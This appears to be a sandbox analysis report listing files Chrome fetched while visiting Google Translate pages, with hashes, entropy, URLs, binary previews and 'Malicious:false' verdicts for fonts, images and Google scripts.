                                                                                                                                                                                                                                                            SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                                                                                                                            SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                                                                                                                            SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3175)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):217272
                                                                                                                                                                                                                                                            Entropy (8bit):5.483960280240619
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:Tm3gh5fU4u9PjMfKyscX0pMhVO/D7Y0MxRYlkvyJJ+:TlHfY9L1pAofG9
                                                                                                                                                                                                                                                            MD5:09BB226E25F5901AB05CB59E4048667E
                                                                                                                                                                                                                                                            SHA1:E8A4E4D274342AD4A67867F1CE00DEA0D6C50ECC
                                                                                                                                                                                                                                                            SHA-256:BBAC5C44568B516158D686421468510AC7C3F6E885DAFBA21B7FBF4EC61ADDA8
                                                                                                                                                                                                                                                            SHA-512:26C31B01A4231C655AB76D71D5BC4E6FDCCBC4EC9D34AD3C2AAC4843B41FFFC13EFB6002B7036F2A9D5D5EEEE4E39C34F61BD71235008687115EEEADB4C32AB4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en.t7_VRwG1YCg.es5.O/am=gemZDQsCAQg/d=1/excm=_b,_r,_tp,mainview/ed=1/dg=0/wt=2/rs=ANkVxDlvfacBZyokG7vQy3Rj8-uiFV5qjQ/m=_b,_tp,_r"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{./*.. Copyright 2013 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2011 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/./*. SPDX-License-Identifier: Apache-2.0 */./*.. Copyright 2005 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2008 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2020 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/.var ka,oa,baa,caa,Wa,Xa,Za,ab,cb,db,eb,kb,daa,eaa,mb,ob,qb,rb,faa,Eb,Hb,haa,Lb,jaa,Tb,Vb,laa,Yb,naa,dc,fc,qaa,raa,mc,taa,uaa,vaa,waa,xaa,yaa,zaa,Aaa,Baa,rc,Eaa,zc,xc,Faa,Ac,Haa,Cc,Bc,Jaa,Kaa,Maa,Laa,Vc,Naa,Paa,Raa,Taa,Qaa,Xaa,Yaa,Uaa,Vaa,aba,bba,cba,dba,dd,$aa,fd,td,hba,ud,wd,xd,kba,mba,nba,pba,qba,uba,wba,Td,yba,Bba,Kba,Gba,pe,Nba,Oba,Qba,Ce,Wba,
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                                            Entropy (8bit):5.052245007941961
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:qTCJLxoRucN+OjTcvXjXRH0DDmJS4RKb5KVEriqGQcFFuIOUoLRFQcRUlypqURL2:qTCJFou1i3mc4slTHmcIgtbNRLprTY
                                                                                                                                                                                                                                                            MD5:10C8AED69BDAED5FA3120401608F0899
                                                                                                                                                                                                                                                            SHA1:6E5A7025855BFB087B556203D18D24843EBBF804
                                                                                                                                                                                                                                                            SHA-256:6F62D85EF6ED53BC368C77B6A47394A41F3B16D9E07D0B8761E726784EEBCEB4
                                                                                                                                                                                                                                                            SHA-512:E2BAD6E1B1AF68AB4511264A4A8506FFFC4B07936BA3D1C5E809926E7E1741AA0DC1E7991848BD21380F12C962E6C6A7BA74FE82FE24EE762AC736A1DE29B045
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-main/img/glue-icon-expand-more.svg
                                                                                                                                                                                                                                                            Preview: <svg id="expand-more" width="18" height="18" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path fill="#5f6368" d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg>
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 512 x 288, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):136806
                                                                                                                                                                                                                                                            Entropy (8bit):7.986761461779284
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:MBGfB4brAOEgELzZa1dI2dvTSuxhogqZ250+7LGt02s8+C8:M8GHAHtU1dIMLSmhraapLGtV4
                                                                                                                                                                                                                                                            MD5:B85D38C87C79771D08680FA4D1F04D66
                                                                                                                                                                                                                                                            SHA1:3DD5BF8F30F74D147AA26F026DAB32B9F19BF8C3
                                                                                                                                                                                                                                                            SHA-256:20CB972F24DCA2A9769A1D4AA905D09354F3D5B92EE378ED23CBF1BAEEC66DCB
                                                                                                                                                                                                                                                            SHA-512:77375FAE62F974BBFC112130B6DC39DBAD3F13A6ED2A9E5265AB288D634A1283C6032004B60F7A713D434399377B9A1DAAA847766E249D847AAF4B46B590A6DA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/tXssN0AcrlblKe6BUWhLJqgTDHdLLVy7OYiagJrHQJONSwFZFDHeAd-BCUQ5G449--R80fEJtGX1Ucz6p3ce6U_3FGCfkkKO4Xxi0ihF21fVarvUV4E
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR....... ......<.Q....sBIT....|.d... .IDATx...,..........9....E...m.t.2..-...XCM4...&.i*.d..1.n..XE.!....g7........hXd..$.t...'22...w.........{.......Z..p.?2;...;...G...../DD.g.....G..j...o...`.;.....Q... .....9....3>....=..98..}.MD.......`.......#8...v....`..;...;...v..}.-.........6.C...O.o......s.m.......v...>...|.....9.oZ..:..N.]8.o....y..`.;....%....`.;....v@......p...n2..?..}.q.....;....v.....!....9..v.?.~..@..7..oY.....}.;..........m.^w6.s..`...@.-S.o..?|..t,.....J....T..-.....7..k....v.....r)_...siW."".j.{.'@..a.RK...k...I.;.o9..<...v.........L.VwN..~.....}..........7A.m......P.......wg....\u.t..X.o..|.D.c......R...=0...:....\;.qw_jA.J;.......]...~..4+B..j%.+..~<.......4...o.(|{px....`..;...H........;`_.`....t...$U.....;..,{6m.W..^.UQ..B..!.w..oQs....l..9....../+.0E<..%+G.....v-5......jAJs.g.dJ...P.......T..V.]+....P+.....P=.......{.z9....v.........k.......i...[....Q.O..E...{.!7'"-8...X....6.BDPQ..l.V*.......$...e..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 400
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):91297
                                                                                                                                                                                                                                                            Entropy (8bit):7.965561514558198
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:voD00H761InWBCitTjai1nfPi1ld0skTUUR4PmnywSTUr4QwSyjJS:w4yKInWdBmiwp0sLUYmyVTUej4
                                                                                                                                                                                                                                                            MD5:0B7F79C52CCEBE46B9ADA8938BD83A91
                                                                                                                                                                                                                                                            SHA1:D4BC1E159B91AB07F0F04F963B1C7D785EA8E045
                                                                                                                                                                                                                                                            SHA-256:12806E0701A1373FEDAB79DAFFA58041E75C959D44D6B2F12CE9173C5D7315E8
                                                                                                                                                                                                                                                            SHA-512:FE22A05B6D004415D93CB8009F94105A83929F138A7245D42F3DBC675E5EE5C133B963E9C94214FAF2A08139CF08D073EF8A25C60B4BE882F90FDF521156B652
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89a........*.......f.*....,!.*..&[..].*.<....m...E...&8..pg.a..h.gOMxm..0%FY.....h.*.......5...PNr........T...*.....K1.js...n....nA..........4....\.%.y...9F.....m..H...HS....).........l....V7..j.*...\..b.....u..g..h..M.........%.>..E....l./)......~........~..........)$=.._n...}.8T]..%.W....v.x.sBF....+\X....ed().......%..Zd......+w..{..K..(...q......7Ml=........$.....1<..r.{f..._CU..z9i`....<.......X...=5q..S..#...n...i.<,..`..d.%4..k...(......v>.......x..."...a.%.{.......d.7 ..k.....m..Y0......g......g5..'...x_.....i....O........#.......*...e...........f.........j..y.....c.-.\....+...d..u<|..(......b..h..r.....d..r..=&@..d.(...r.0...b..p..p..r..r..o..`.._..s0....o.....d..m..d..b.,...o..b..i..f1........um..4.......n.......(8......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x333, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):44316
                                                                                                                                                                                                                                                            Entropy (8bit):7.98091015162583
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:xBpvHF10JmIulXcbqKOzcslyNgo212n9osllTcX3k5jFT5J1dJfCJ8RhWT569qSe:x7vlCJmIulM2eslyuqlGX6FTJXCJqhWf
                                                                                                                                                                                                                                                            MD5:CA88528299E20C7F7499C2628BA2F4E6
                                                                                                                                                                                                                                                            SHA1:A9A15FD459050547EE2360D6EDFE93D70F9937E6
                                                                                                                                                                                                                                                            SHA-256:B561C264D8DC196307E56F7D7AFC0798C8CD6DEA54EDD33650F21CD86473E035
                                                                                                                                                                                                                                                            SHA-512:707D03B1981C0851D845FFC93F66A8611AF5A524E05AE66C510BCA4FF809320EE700C9C8E8D601D3439DE621F6CEFCE01B7AA71AA58118C9F8C43BDA900C3797
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/EICyRNLJhOmFUAfdDXw9x4mQAeefUSSZyYNNVxLzCO6q7VfCIMG9faB3-q8aSqz6xtHUzgJ14Pdgpl3UoMEDU8fCVWQ-pyhxBbbM1lsBf-Wj3xX_FtxW=w1440-l90-sg-rj-c0xffffff
                                                                                                                                                                                                                                                            Preview:......JFIF......................................................................................................................................................M....".........................................c.........................!.1Q.."Aaq2....BR.#b...3r...CS.....$d....%4FTcs.........D......EVft.....................................8.........................!"12.AQ.Bq.R.a..#.3br..$.................?.....8..E..4..<i.1..H.P..,-.@P7.....+......i....)M...m..4W.k.WKbq^.w...]"s_R.+..Y.WV..W..8.tWZ+.WK.4WZk.5...........:..M......F..E...?...T..o.P..Z..{...%q8..M......+W.k........y.....t.Mr.Ki...N..d.Yi...a]+.+.3....f.f..lp.A.BJ..V.5yu.w...9..(...c..Y..../q..Z....`2..J...7..w..i...I.._.}..9dO.L^.0..`'.r..<.JI....AP.YyJ........n...H.4.r...6!K[R..P...l.t..q.F52...-.@.....j....L1..a<rHA...L-...Z....+.8...^..... .{[..|..Pv4....q2>...&.q......,..id.*.w.......O$N5Y.^_..J..Ix..%.....\F C.g..F..].Ek.\.*...I..@Ul..b2...\]$..=.-..-\B..B.#_q...qaosQ.>n..#p.s..G.....w....3*..SP
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=2, software=Picasa], baseline, precision 8, 660x255, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):99350
                                                                                                                                                                                                                                                            Entropy (8bit):7.973790140768698
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:XGY6Ks1dANp742EeGkKsYHKa48+tFhUuq3CEt:vtte2EvkHYHKa9qFg3
                                                                                                                                                                                                                                                            MD5:5645515D0FA6BF88ED5EB58F3229BD63
                                                                                                                                                                                                                                                            SHA1:725598A5885740C837D7DEDD8848E3A82C43B830
                                                                                                                                                                                                                                                            SHA-256:2997DADB3274EACBAB9830144A55914597A73DD922E26CAF4BD83141B2715653
                                                                                                                                                                                                                                                            SHA-512:3576CD219144BA377306238CB6141977E02B8940EFD527CF3503F4A2C55A15AE10D3DB940C0424B333760A2FC6D1B4E85F0DDE6A3362A69CBF398C2B0E9F0F67
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............RExif..II*.......1.......&...;.......-.......Picasa.Jon Wiley and Micheal Lopez.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Cond
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):846
                                                                                                                                                                                                                                                            Entropy (8bit):7.658615964509905
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:6v/75+FiSiSwIl1kctxgR9gZeQP722hGKuDl1DBqBSl6pSdxRP6q0no2fxEpytwX:AzQwIDw+VDv4BqBytJ0o2fSEtHwyKwu
                                                                                                                                                                                                                                                            MD5:E9CD262114358F26B7608B56905185DC
                                                                                                                                                                                                                                                            SHA1:6DBDE0A96DEAAB2B529723CE26C62043CF9180AB
                                                                                                                                                                                                                                                            SHA-256:5A861509B658AA24FC3AED2867AC3C061E7D818D90B9990959AFC6D1B5D4FF99
                                                                                                                                                                                                                                                            SHA-512:9CB46A8FD21A1C89A65642E1E5E79AF08BAC183612F88B8AC805A436E59ADD06588B450C6330291A6B61E7E6018B009015950D4457E46B68D9D742F983AB8488
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR..............w=.....IDATx.b..H..NN]n.Q..s..T.=S...U\.......77......|q......t!.]t.._x\......a.....";n.N..@...+:!....GG.~+..q.&g.B....@DN$.=...`..2..L.(.W.H.)....x..W.....P...A........p:=.q.....0y$..p.q.Q.E.w..<..$.....c.p`d...I,..G.9"/?..l.S..D......Q......|.....xx...{|DN...E..........d.....-*.s......8vt..b.....q.d....T....j.0>1...9Ir..D^|6.No.....+d......H.`#.-y!.;....2...\D.)............L..+.Z.[.T.. ...Ah...kp.).w.9.....E.Y..'.............n...G... ..b.....ph.U..*V..Fy.3.U].u..]r..v;x.^....Di*2.Q.... ....R.%.P&...Np:...,.:....0..t.U.Gpk..wHN..{..............#.Ab&'.$A<~....z(=~...y.,...b.A.....H...n{Q.1..`....cCKr ..HV.4.L...H.a.$D........Y}b..Z#...Mq.0.W..{?.[T....."pA.+<.l@........v..-......E.ZQ.=j....q.........ay.E%o.J^...Z..`.....[.......ZloW.Z...A........V+=.|C.:w........e..?.....IEND.B`.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 400
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):217166
                                                                                                                                                                                                                                                            Entropy (8bit):7.942438043319121
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:0heqOLvgouekDAxIGAF1BR55NLO9jj604mMfXJwia1sNy5ABPCeiO2z:01Oj5urDF7R5POEXJwiFy2BPbiO2z
                                                                                                                                                                                                                                                            MD5:A9049BDBEC3B156F4E06C16C4C5F224F
                                                                                                                                                                                                                                                            SHA1:0D59B5A0F9642F89ECA6C965A67C2B8A7D3F72F3
                                                                                                                                                                                                                                                            SHA-256:A5982C2B5C5DCBF6F6594CE88EA326BBD3F09BC896A8E9BB532529A83BD39005
                                                                                                                                                                                                                                                            SHA-512:A8DE4E409ECCAA01AE6EA4C72C327EC5CA24786DBF430A6E720007C742AFA408BBAD9D0CA58B8AB48B669BF0D9333E4B8E7AC8A5C9B829F6806E9D36B5E3F7D4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2022/tunisia-national-day-2022-6753651837109600-2xa.gif
                                                                                                                                                                                                                                                            Preview:GIF89a.....~.............k..<..........d.....W..h..PW.....A..H.....X.....D..R...9.......0....-XK..<.........^h.Jt...J.......%.....|..[..D..E...._..Y.....>..E..y.........9G......0...c......5A..y..............r........8.....b..g..s..5......"3k..ly.I..k.....{..{..{..L.......b..s..A...nr:w...................c..]...A.......Q..H...........;.................s.....\V.U...........................................w....u.....v...........U.................g..I.........d.....................a..............f...........I..u..M..S.....f......................................A.....E..........E...d..............................8.....f.................w....v..k..v....q..].-..#v......v....d...... ........i..~.....$...^.....S.............................;.....!..NETSCAPE2.0.....!.....~.,............w..H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (55128)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):286186
                                                                                                                                                                                                                                                            Entropy (8bit):5.48406541819981
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:fuiO0tAmuKmZSg9gqWTS1jLst9X6+pbShpLpkHz+k+baMGGhi9APpiz5hM0PkSdS:8GQclwKJBU
                                                                                                                                                                                                                                                            MD5:7558F00D86299C08DFC24AA61BAA5DB8
                                                                                                                                                                                                                                                            SHA1:77ECEDEB0951667C47C114CD3E235181F2E86594
                                                                                                                                                                                                                                                            SHA-256:9877B83D33DF5FD1D5874001B18AE25937E27739A7EA38C36F7C7F4EB283D8CD
                                                                                                                                                                                                                                                            SHA-512:66EA45DB89058CC9CACD6100EADBFC5B9860772D73367D2F78DF2D3339B252C8DAC095BF2FB45A7FFFDEA6D11D0FCF6821514816DC218CB90C646010F719947F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.googletagmanager.com/gtm.js?id=GTM-WQZB4J
                                                                                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved..(function(){..var data = {."resource": {. "version":"301",. . "macros":[{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__remm","vtp_setDefaultValue":true,"vtp_input":["macro",2],"vtp_fullMatch":false,"vtp_replaceAfterMatch":true,"vtp_ignoreCase":true,"vtp_defaultValue":"\/","vtp_map":["list",["map","key","\\\/(intl)\\\/(.*?)\\\/(.*)","value","\/intl\/$2\/"]]},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":["macro",0],"vtp_name":"originalLocation"},{"function":"__u","vtp_component":"PROTOCOL","vtp_customUrlSource":["macro",4],"vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_stripWww":false,"vtp_component":"HOST","vtp_customUrlSource":
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (380)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):60948
                                                                                                                                                                                                                                                            Entropy (8bit):4.5441564492540785
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:cAqR9xOs36ZmZ5/kxNxnP7fyC/PWIGbRBp8ydnY:cLnKZmZ5/gf/eIGNBndnY
                                                                                                                                                                                                                                                            MD5:1FA6AB83E37343F33DF9A41541C057F2
                                                                                                                                                                                                                                                            SHA1:CA3C360A6EDC5FE6C42AE0EE7F3A932A3A72C23C
                                                                                                                                                                                                                                                            SHA-256:16F2D59720CB24DC8B0E3B0AE7C1AB09614B6E6BE60E1D72365E9FF309CF8CAD
                                                                                                                                                                                                                                                            SHA-512:2CCCE4F69A9EB323526BF46B247D688F9757ABE3077E7C43C79F44AD1BC31416FA1A749B5E5C00B81977FD795A3DDB62E593EF3579AFF8BBF92A57C7BCA7AE81
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://translate.google.com/about/?hl=en-US
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <meta content="initial-scale=1, minimum-scale=1, width=device-width" name="viewport">. <title>Google Translate - A Personal Interpreter on Your Phone or Computer</title>. <meta name="description" content="Understand your world and communicate across languages with Google Translate. Translate text, speech, images, documents, websites, and more across your devices.">. <meta name="referrer" content="no-referrer">. <meta name="robots" content="index,follow">. <meta property="og:url" content="https://translate.google.com/about/">. <meta property="og:title" content="Understand your world and communicate across languages">. <meta property="og:description" content="Learn how to translate text, speech, images, documents, websites, and more with Google Translate.">. <meta property="og:site_name" content="Google Translate About">. <meta property="og:type" content="website">. <meta property="og:l
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 1400 x 420, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):265572
                                                                                                                                                                                                                                                            Entropy (8bit):7.9833672181816455
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:gNoj3jGLCoTVgcwjIA5sWiW2vLHG7xrJQnKHgrx+O8iiJeVcniIImEImo6pOBjRw:iojq3uXsvLMNQnn+O81eVlmEIh6pOk
                                                                                                                                                                                                                                                            MD5:180E2F43D5E0271E1A0C706C416213AB
                                                                                                                                                                                                                                                            SHA1:AE70DD5A3206F6611429A1AA18E0A1DB2B49854F
                                                                                                                                                                                                                                                            SHA-256:7D609854BD0FF0D600DF53098BA765703D7802F697875472FFB10F80BCF31F73
                                                                                                                                                                                                                                                            SHA-512:E48949862212177E8470741B8430DA9F2DE1D3C0D414CB90D00337E4B3B7732629813E21BA2124CD1EE818D533BB96BCE89F511862FE7F91C2E6BEE02FA8C793
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...x...........Mp...+IDATx.....A......%.".i.>..B..R...$"$..9.ng..y....m..o........[......@......./....../....../......................... ...... ...... ......0.r....._.fe.w.]NUKRIz...Z..[s...R.L..j...y*mkn.8..>}.d|.......=&.z..,._../.r....u7.......k}.o..x.....J*k*c...q.<.5.o....Y..m...w.?fa.u..x.'O.....x..vme.W...\..(.fS...}..?._?.Y........U..bYR,...>.WS..V........i.m.a..b.O..._..... ....c.e.........w+...M...\Uw9..<..sz....../Y..,x..OJ.m.,I.^.....!........<..2g[T.d..4M...{..O....^....7..g.(%.8.i..OoI..... ...,c.7.]....k..S~...@...,x.].V]U..t]...>....x..V.....a[U]r....!....../..*.<d./)e.._./}........../.....2..h...u...*../.......*,C.e.&..(%i.Kvw.y...... .......m1.K....)...Y....x....2....+%..%ms...!O...........,...T..).....KJUg...@.....6I....~..6M^...........o..=....\.._NY....x....R.l...r...^...}........`.<tI.....x.a...........p.<^R...s..;.RJ...U......`..,.5)u.E)%]wI.{.........*....e..)..(%i.K....?.........,c.e..R...i..4]..<.^......
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3200)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):36262
                                                                                                                                                                                                                                                            Entropy (8bit):5.362458156217949
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Fn7AJQsDpxzcVX0PUchKV6uAShTRJtBhy:Fn4hU8Y6uLdhy
                                                                                                                                                                                                                                                            MD5:3B4257EDC4AB4744BEB648D394EBAD0E
                                                                                                                                                                                                                                                            SHA1:7F4F00EC5A27DBFDAF564D1C438644E0D28BF3B3
                                                                                                                                                                                                                                                            SHA-256:76B44CFFD0F76E2527015894C3B240102329729F9C5B8BF151BF8A5B7084856A
                                                                                                                                                                                                                                                            SHA-512:6A8D459989038B772D9A5F4C26694AD056E5F41ED63204EBE3B8B15414D95712C90C7D14AA7E9CFF15C98B3B6F29ED8ABAFD72BED063007DF561BCDB27B11F8B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/brandstudio/kato/cookie_choice_component/cookie_consent_bar.v3.js
                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},p="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},ca=ba(this),q=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&p(c,a,{configurable:!0,writable:!0,value:b})}};.q("Symbol",function(a){if(a)return a;var b=function(f,l){this.ya=f;p(this,"description",{configurable:!0,writable:!0,value:l})};b.prototype.toString=function(){
